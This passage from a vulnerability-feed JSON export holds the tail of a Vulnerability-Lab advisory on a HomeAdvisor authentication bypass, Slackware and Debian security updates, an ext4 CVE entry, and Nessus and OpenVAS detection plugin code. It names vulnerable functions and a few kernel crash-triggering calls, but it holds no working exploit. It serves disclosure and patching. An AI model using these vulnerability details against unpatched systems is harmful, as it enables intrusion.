Set-Cookie[ServerID=503949504.20480.0000; \r\n\texpires=; \r\n\tpath=/TS014cf8c3=0109d29b8d523dbe082e522b290c477faaf9f27c2227b5a2d61bc9d1c4cf3585484177c0a2c1c1f1c8aec540b56ba70f0bff7c262\r\n\t464155a8619369b41c16001e8ea4934a70f9e98c52feaa9056483832d5f64b768ba67c975bf71b8341d169a6e56a17d1aefaa18e4d99dfebe5143ddd7da16b5f48724d8ed0db03fd8a3d3d0936874e993\r\n\t16d598672952421e80372b1915bc2b9360524bbc178c584fb3981fba3262b50f; Path=/]\r\n\r\n\r\nReference(s):\r\nhttps://pro.homeadvisor.com/\r\nhttps://pro.homeadvisor.com/servlet/\r\nhttps://pro.homeadvisor.com/servlet/HomeServlet\r\nhttps://pro.homeadvisor.com/servlet/HomeServlet?entityHash\r\n\r\n\r\nSolution - Fix & Patch:\r\n=======================\r\nThe vulnerability has been reported to the manufacturer in 2016 Q3 - Q4 to the official bug bounty program. \r\nThe security issue has been resolved by the homeadvisor developer team in 2017 Q3 - Q4. \r\nThe disclosure process around the issue took about 8 month.\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the authentication bypass vulnerability in the entityHash is estimated as critical. \r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability-Lab [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or \r\nimplied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any \r\ncase of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its \r\nsuppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental\r\nor consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface \r\nwebsites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories \r\nor vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, \r\nphone numbers, conversations or anything else to journalists, investigative authorities or private individuals. \r\n\r\nDomains: www.vulnerability-lab.com\t\t- www.vulnerability-db.com\t\t\t\t\t- www.evolution-sec.com\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php \t- vulnerability-lab.com/register.php\r\nFeeds:\t vulnerability-lab.com/rss/rss.php \t- vulnerability-lab.com/rss/rss_upcoming.php \t\t\t- vulnerability-lab.com/rss/rss_news.php\r\nSocial:\t twitter.com/vuln_lab\t\t- facebook.com/VulnerabilityLab \t\t\t\t- youtube.com/user/vulnerability0lab\r\n\r\nAny modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark \r\nof vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.\r\n\r\n\t\t\t\t Copyright \u00a9 2018 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "slackware": [{"lastseen": "2018-07-19T03:33:37", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "2.4.34", "arch": "x86_64", "packageFilename": "httpd-2.4.34-x86_64-1_slack14.1.txz", "packageName": "httpd", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "2.4.34", "arch": "i586", "packageFilename": "httpd-2.4.34-i586-1_slack14.2.txz", "packageName": "httpd", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "2.4.34", "arch": "x86_64", "packageFilename": "httpd-2.4.34-x86_64-1_slack14.0.txz", "packageName": "httpd", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "2.4.34", "arch": "x86_64", "packageFilename": "httpd-2.4.34-x86_64-1_slack14.2.txz", "packageName": "httpd", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "2.4.34", "arch": "i486", "packageFilename": "httpd-2.4.34-i486-1_slack14.1.txz", "packageName": "httpd", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "2.4.34", "arch": "i486", "packageFilename": "httpd-2.4.34-i486-1_slack14.0.txz", "packageName": "httpd", "operator": "lt"}], "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.34-i586-1_slack14.2.txz: Upgraded.\n This update fixes two denial of service issues:\n mod_md: DoS via Coredumps on specially crafted requests\n mod_http2: DoS for HTTP/2 connections by specially crafted requests\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8011\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1333\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.34-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.34-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.34-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.34-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.34-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.34-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.34-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.34-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n91123a66731b7803ebac0f55e3099e81 httpd-2.4.34-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n49c0a8ae83d724da460b73a78ddf1dda httpd-2.4.34-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nd695afcd996b00f7dbe00c89bf1c0ee1 httpd-2.4.34-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n8ebc97729250d80d319174ff64ca2921 httpd-2.4.34-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n149a610e5280fcfbbe1066fa9cfeb970 httpd-2.4.34-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n7a35ce525340631b74e8ffe9e58f2b4c httpd-2.4.34-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nd95348a370dd9c2edc92c6f2274b8ce2 n/httpd-2.4.34-i586-1.txz\n\nSlackware x86_64 -current package:\ndaea307cb655b015c4bafcbec6ba9869 n/httpd-2.4.34-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.34-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "edition": 1, "reporter": "Slackware Linux Project", "published": "2018-07-18T15:50:34", "title": "httpd", "type": "slackware", "enchantments": {"score": {"modified": "2018-07-19T03:33:37", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-1333", "CVE-2018-8011"], "modified": "2018-07-18T15:50:34", "id": "SSA-2018-199-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.437384", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2018-07-20T10:51:42", "references": ["https://lists.debian.org/debian-lts-announce/2018/07/msg00020.html", "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10877"], "description": "Linux kernel ext4 filesystem is vulnerable to an out-of-bound access in the ext4_ext_drop_refs() function when operating on a crafted ext4 filesystem image.", "edition": 2, "reporter": "NVD", "published": "2018-07-18T11:29:00", "title": "CVE-2018-10877", "type": "cve", "enchantments": {"score": {"modified": "2018-07-20T10:51:42", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-10877"], "scanner": [], "modified": "2018-07-19T21:29:00", "cpe": [], "id": "CVE-2018-10877", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10877", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2018-07-19T03:57:04", "references": ["https://oss.oracle.com/pipermail/el-errata/2018-July/007888.html"], "pluginID": "111144", "description": "Description of changes:\n\n[2.6.39-400.300.2.el6uek]\n- Revert 'RDS: don't commit to queue till transport connection is up' (Santosh Shilimkar) [Orabug: 27619034] - KVM: Fix stack-out-of-bounds read in write_mmio (Wanpeng Li) [Orabug: 27951293] {CVE-2017-17741} {CVE-2017-17741}\n- kernel/exit.c: avoid undefined behaviour when calling wait4() wait4(-2147483648, 0x20, 0, 0xdd0000) triggers: UBSAN: Undefined behaviour in kernel/exit.c:1651:9 (mridula shastry) [Orabug: 28049790] {CVE-2018-10087}\n- kernel/signal.c: avoid undefined behaviour in kill_something_info When running kill(72057458746458112, 0) in userspace I hit the following issue. (mridula shastry) [Orabug: 28082989] {CVE-2018-10124}\n- bluetooth: Validate socket address length in sco_sock_bind(). (mlevatic) [Orabug: 28130291] {CVE-2015-8575}\n- x86/bug: Fix typo's from commit b2d2b5b2 (x86/fpu: Make eager FPU default) (Mihai Carabas) [Orabug: 28194606] - dccp: check sk for closed state in dccp_sendmsg() (Alexey Kodanev) [Orabug: 28220512] {CVE-2017-8824} {CVE-2018-1130}\n- mm/mempolicy.c: fix error handling in set_mempolicy and mbind. (Chris Salls) [Orabug: 28242479] {CVE-2017-7616}\n- xfrm: policy: check policy direction value (Vladis Dronov) [Orabug: 28264531] {CVE-2017-11600} {CVE-2017-11600}", "edition": 1, "reporter": "Tenable", "published": "2018-07-18T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2018-4172)", "type": "nessus", "enchantments": {"score": {"modified": "2018-07-19T03:57:04", "vector": "NONE", "value": 5.0}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7616", "CVE-2017-17741", "CVE-2017-8824", "CVE-2018-1130", "CVE-2015-8575", "CVE-2018-10087", "CVE-2018-10124", "CVE-2017-11600"], "modified": "2018-07-18T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2018-4172.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111144", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2018-4172.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111144);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/07/18 15:05:30\");\n\n script_cve_id(\"CVE-2015-8575\", \"CVE-2017-11600\", \"CVE-2017-17741\", \"CVE-2017-7616\", \"CVE-2017-8824\", \"CVE-2018-10087\", \"CVE-2018-10124\", \"CVE-2018-1130\");\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2018-4172)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.300.2.el6uek]\n- Revert 'RDS: don't commit to queue till transport connection is up' \n(Santosh Shilimkar) [Orabug: 27619034] - KVM: Fix stack-out-of-bounds \nread in write_mmio (Wanpeng Li) [Orabug: 27951293] {CVE-2017-17741} \n{CVE-2017-17741}\n- kernel/exit.c: avoid undefined behaviour when calling wait4() \nwait4(-2147483648, 0x20, 0, 0xdd0000) triggers: UBSAN: Undefined \nbehaviour in kernel/exit.c:1651:9 (mridula shastry) [Orabug: 28049790] \n{CVE-2018-10087}\n- kernel/signal.c: avoid undefined behaviour in kill_something_info When \nrunning kill(72057458746458112, 0) in userspace I hit the following \nissue. (mridula shastry) [Orabug: 28082989] {CVE-2018-10124}\n- bluetooth: Validate socket address length in sco_sock_bind(). \n(mlevatic) [Orabug: 28130291] {CVE-2015-8575}\n- x86/bug: Fix typo's from commit b2d2b5b2 (x86/fpu: Make eager FPU \ndefault) (Mihai Carabas) [Orabug: 28194606] - dccp: check sk for closed \nstate in dccp_sendmsg() (Alexey Kodanev) [Orabug: 28220512] \n{CVE-2017-8824} {CVE-2018-1130}\n- mm/mempolicy.c: fix error handling in set_mempolicy and mbind. (Chris \nSalls) [Orabug: 28242479] {CVE-2017-7616}\n- xfrm: policy: check policy direction value (Vladis Dronov) [Orabug: \n28264531] {CVE-2017-11600} {CVE-2017-11600}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-July/007888.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.300.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.300.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.300.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.300.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.300.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.300.2.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-07-19T13:21:12", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-access-extra_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-access-extra", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-video-splitter_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-video-splitter", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-data_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-data", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "libvlc-bin_3.0.3-1-0+deb9u1_all.deb", "packageName": "libvlc-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-sdl_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-sdl", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-svg_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-svg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-notify_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-notify", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-nox_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-nox", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "libvlc5_3.0.3-1-0+deb9u1_all.deb", "packageName": "libvlc5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-video-output_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-video-output", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-visualization_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-visualization", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-bin_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-skins2_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-skins2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-base_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-base", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "libvlccore-dev_3.0.3-1-0+deb9u1_all.deb", "packageName": "libvlccore-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-zvbi_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-zvbi", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "libvlc-dev_3.0.3-1-0+deb9u1_all.deb", "packageName": "libvlc-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-jack_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-jack", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-qt_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-qt", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-samba_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-samba", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-l10n_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-l10n", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "vlc-plugin-fluidsynth_3.0.3-1-0+deb9u1_all.deb", "packageName": "vlc-plugin-fluidsynth", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "libvlccore9_3.0.3-1-0+deb9u1_all.deb", "packageName": "libvlccore9", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "3.0.3-1-0+deb9u1", "arch": "all", "packageFilename": "libvlccore8_3.0.3-1-0+deb9u1_all.deb", "packageName": "libvlccore8", "operator": "lt"}], "description": "A use-after-free was discovered in the MP4 demuxer of the VLC media player, which could result in the execution of arbitrary code if a malformed media file is played.\n\nFor the stable distribution (stretch), this problem has been fixed in version 3.0.3-1-0+deb9u1.\n\nWe recommend that you upgrade your vlc packages.\n\nFor the detailed security status of vlc please refer to its security tracker page at: <https://security-tracker.debian.org/tracker/vlc>", "edition": 1, "reporter": "Debian", "published": "2018-07-18T00:00:00", "title": "vlc -- security update", "type": "debian", "enchantments": {"score": {"modified": "2018-07-19T13:21:12", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-11529"], "modified": "2018-07-18T00:00:00", "id": "DSA-4251", "href": "http://www.debian.org/security/dsa-4251", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-19T01:38:13", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "4.7.5+dfsg-2+deb9u4", "arch": "all", "packageFilename": "wordpress-l10n_4.7.5+dfsg-2+deb9u4_all.deb", "packageName": "wordpress-l10n", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "4.7.5+dfsg-2+deb9u4", "arch": "all", "packageFilename": "wordpress-theme-twentyseventeen_4.7.5+dfsg-2+deb9u4_all.deb", "packageName": "wordpress-theme-twentyseventeen", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "4.7.5+dfsg-2+deb9u4", "arch": "all", "packageFilename": "wordpress-theme-twentysixteen_4.7.5+dfsg-2+deb9u4_all.deb", "packageName": "wordpress-theme-twentysixteen", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "4.7.5+dfsg-2+deb9u4", "arch": "all", "packageFilename": "wordpress_4.7.5+dfsg-2+deb9u4_all.deb", "packageName": "wordpress", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "4.7.5+dfsg-2+deb9u4", "arch": "all", "packageFilename": "wordpress-theme-twentyfifteen_4.7.5+dfsg-2+deb9u4_all.deb", "packageName": "wordpress-theme-twentyfifteen", "operator": "lt"}], "description": "A vulnerability was discovered in Wordpress, a web blogging tool. It allowed remote attackers with specific roles to execute arbitrary code.\n\nFor the stable distribution (stretch), this problem has been fixed in version 4.7.5+dfsg-2+deb9u4.\n\nWe recommend that you upgrade your wordpress packages.\n\nFor the detailed security status of wordpress please refer to its security tracker page at: <https://security-tracker.debian.org/tracker/wordpress>", "edition": 1, "reporter": "Debian", "published": "2018-07-18T00:00:00", "title": "wordpress -- security update", "type": "debian", "enchantments": {"score": {"modified": "2018-07-19T01:38:13", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-12895"], "modified": "2018-07-18T00:00:00", "id": "DSA-4250", "href": "http://www.debian.org/security/dsa-4250", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2018-07-18T19:34:44", "references": ["http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"], "pluginID": "1361412562310813715", "description": "This host is running Oracle MySQL and is\n prone to multiple vulnerabilities.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-18T00:00:00", "title": "Oracle MySQL Security Updates-06 (jul2018-4258247) Linux", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-18T19:34:44", "vector": "NONE", "value": 7.5}}, "naslFamily": "Databases", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-3065", "CVE-2018-3060", "CVE-2018-3077", "CVE-2018-3054", "CVE-2018-3056"], "modified": "2018-07-18T00:00:00", "id": "OPENVAS:1361412562310813715", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813715", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_mysql_jul2018-4258247_06_lin.nasl 10538 2018-07-18 10:58:40Z santu $\n#\n# Oracle MySQL Security Updates-06 (jul2018-4258247) Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 